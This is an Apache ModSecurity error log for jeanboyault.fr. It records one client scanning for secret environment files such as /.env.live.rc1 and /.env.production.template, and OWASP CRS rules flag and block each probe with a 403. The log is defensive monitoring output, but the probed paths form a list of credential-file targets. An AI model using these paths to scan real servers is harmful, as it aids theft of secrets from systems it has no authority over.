[Mon May 11 11:52:41.131163 2026] [security2:error] [pid 1254179:tid 1254190] [client 185.177.72.9:29146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm52S6k_SCYd1AVZqt3wAAAQk"]
[Mon May 11 11:52:41.163288 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:29154] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.docker.sample"] [unique_id "agGm6ZkIEwRJMyDaV55OewAAAUY"]
[Mon May 11 11:52:41.163905 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:29154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.docker.sample"] [unique_id "agGm6ZkIEwRJMyDaV55OewAAAUY"]
[Mon May 11 11:52:42.393181 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:29154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm6ZkIEwRJMyDaV55OewAAAUY"]
[Mon May 11 11:52:42.425096 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:29168] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example-hotfix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.example-hotfix"] [unique_id "agGm6hjZymfuKpjWXeh83AAAAM0"]
[Mon May 11 11:52:42.425852 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:29168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.example-hotfix"] [unique_id "agGm6hjZymfuKpjWXeh83AAAAM0"]
[Mon May 11 11:52:43.646102 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:29168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm6hjZymfuKpjWXeh83AAAAM0"]
[Mon May 11 11:52:43.678479 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.177.72.9:26550] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example-hotfix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.example-hotfix"] [unique_id "agGm6xjZymfuKpjWXeh83gAAAMk"]
[Mon May 11 11:52:43.679265 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.177.72.9:26550] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.example-hotfix"] [unique_id "agGm6xjZymfuKpjWXeh83gAAAMk"]
[Mon May 11 11:52:44.929448 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.177.72.9:26550] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm6xjZymfuKpjWXeh83gAAAMk"]
[Mon May 11 11:52:44.961412 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:26560] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example.inactive"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.example.inactive"] [unique_id "agGm7L4KNmD_mZ_vlf84rgAAAEM"]
[Mon May 11 11:52:44.961990 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:26560] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.example.inactive"] [unique_id "agGm7L4KNmD_mZ_vlf84rgAAAEM"]
[Mon May 11 11:52:46.172478 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:26560] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm7L4KNmD_mZ_vlf84rgAAAEM"]
[Mon May 11 11:52:46.203485 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:26574] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example.inactive"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.example.inactive"] [unique_id "agGm7pkIEwRJMyDaV55OhQAAAUo"]
[Mon May 11 11:52:46.204495 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:26574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.example.inactive"] [unique_id "agGm7pkIEwRJMyDaV55OhQAAAUo"]
[Mon May 11 11:52:47.470391 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:26574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm7pkIEwRJMyDaV55OhQAAAUo"]
[Mon May 11 11:52:47.501918 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:26580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.live.rc1"] [unique_id "agGm72S6k_SCYd1AVZqt7QAAAQs"]
[Mon May 11 11:52:47.502383 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:26580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.live.rc1"] [unique_id "agGm72S6k_SCYd1AVZqt7QAAAQs"]
[Mon May 11 11:52:48.672920 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:26580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm72S6k_SCYd1AVZqt7QAAAQs"]
[Mon May 11 11:52:48.700704 2026] [security2:error] [pid 1254212:tid 1254230] [client 185.177.72.9:26590] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.live.rc1"] [unique_id "agGm8EYQeUtAPynIs6xYUQAAABA"]
[Mon May 11 11:52:48.701634 2026] [security2:error] [pid 1254212:tid 1254230] [client 185.177.72.9:26590] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.live.rc1"] [unique_id "agGm8EYQeUtAPynIs6xYUQAAABA"]
[Mon May 11 11:52:49.946812 2026] [security2:error] [pid 1254212:tid 1254230] [client 185.177.72.9:26590] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm8EYQeUtAPynIs6xYUQAAABA"]
[Mon May 11 11:52:49.976905 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.177.72.9:26596] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.live.sample"] [unique_id "agGm8WS6k_SCYd1AVZqt8AAAAQo"]
[Mon May 11 11:52:49.977381 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.177.72.9:26596] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.live.sample"] [unique_id "agGm8WS6k_SCYd1AVZqt8AAAAQo"]
[Mon May 11 11:52:51.138508 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.177.72.9:26596] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm8WS6k_SCYd1AVZqt8AAAAQo"]
[Mon May 11 11:52:51.165815 2026] [security2:error] [pid 1254133:tid 1254138] [client 185.177.72.9:26608] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.live.sample"] [unique_id "agGm8xjZymfuKpjWXeh86gAAAMI"]
[Mon May 11 11:52:51.166454 2026] [security2:error] [pid 1254133:tid 1254138] [client 185.177.72.9:26608] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.live.sample"] [unique_id "agGm8xjZymfuKpjWXeh86gAAAMI"]
[Mon May 11 11:52:52.386089 2026] [security2:error] [pid 1254133:tid 1254138] [client 185.177.72.9:26608] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm8xjZymfuKpjWXeh86gAAAMI"]
[Mon May 11 11:52:52.413224 2026] [security2:error] [pid 1254328:tid 1254334] [client 185.177.72.9:26622] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local2023"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.local2023"] [unique_id "agGm9ERdw2n9wv6Ai48IVgAAAIM"]
[Mon May 11 11:52:52.413821 2026] [security2:error] [pid 1254328:tid 1254334] [client 185.177.72.9:26622] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.local2023"] [unique_id "agGm9ERdw2n9wv6Ai48IVgAAAIM"]
[Mon May 11 11:52:53.574893 2026] [security2:error] [pid 1254328:tid 1254334] [client 185.177.72.9:26622] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm9ERdw2n9wv6Ai48IVgAAAIM"]
[Mon May 11 11:52:53.604581 2026] [security2:error] [pid 1254212:tid 1254214] [client 185.177.72.9:1630] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local2023"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.local2023"] [unique_id "agGm9UYQeUtAPynIs6xYVQAAAAA"]
[Mon May 11 11:52:53.605165 2026] [security2:error] [pid 1254212:tid 1254214] [client 185.177.72.9:1630] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.local2023"] [unique_id "agGm9UYQeUtAPynIs6xYVQAAAAA"]
[Mon May 11 11:52:54.820267 2026] [security2:error] [pid 1254212:tid 1254214] [client 185.177.72.9:1630] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm9UYQeUtAPynIs6xYVQAAAAA"]
[Mon May 11 11:52:54.847038 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:1632] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.production.template"] [unique_id "agGm9mS6k_SCYd1AVZqt8gAAAQI"]
[Mon May 11 11:52:54.847525 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:1632] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.production.template"] [unique_id "agGm9mS6k_SCYd1AVZqt8gAAAQI"]
[Mon May 11 11:52:56.032669 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:1632] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGm9mS6k_SCYd1AVZqt8gAAAQI"]
[Mon May 11 11:52:56.065451 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:1646] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.production.template"] [unique_id "agGm-GS6k_SCYd1AVZqt8wAAARE"]
[Mon May 11 11:52:56.065781 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:1646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.production.template"] [unique_id "agGm-GS6k_SCYd1AVZqt8wAAARE"]
